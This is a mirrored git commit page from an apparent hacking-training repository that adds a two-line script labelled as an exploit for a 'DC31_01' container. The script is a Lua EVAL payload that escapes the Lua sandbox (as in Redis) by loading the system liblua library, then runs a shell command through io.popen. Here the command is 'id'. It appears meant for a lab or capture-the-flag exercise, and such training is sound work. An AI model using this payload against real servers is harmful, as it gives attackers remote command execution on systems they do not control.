mirror of
https://github.com/The-Art-of-Hacking/h4cker
synced 2024-11-10 05:34:12 +00:00
Create dc31_01.sh
This commit is contained in:
parent
3b51fcb37a
commit
25fc6ca94c
1 changed files with 2 additions and 0 deletions
2
web_application_testing/additional_exploits/dc31_01.sh
Normal file
2
web_application_testing/additional_exploits/dc31_01.sh
Normal file
|
@ -0,0 +1,2 @@
|
|||
# Exploit for the DC31_01 container
|
||||
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0
|
Loading…
Reference in a new issue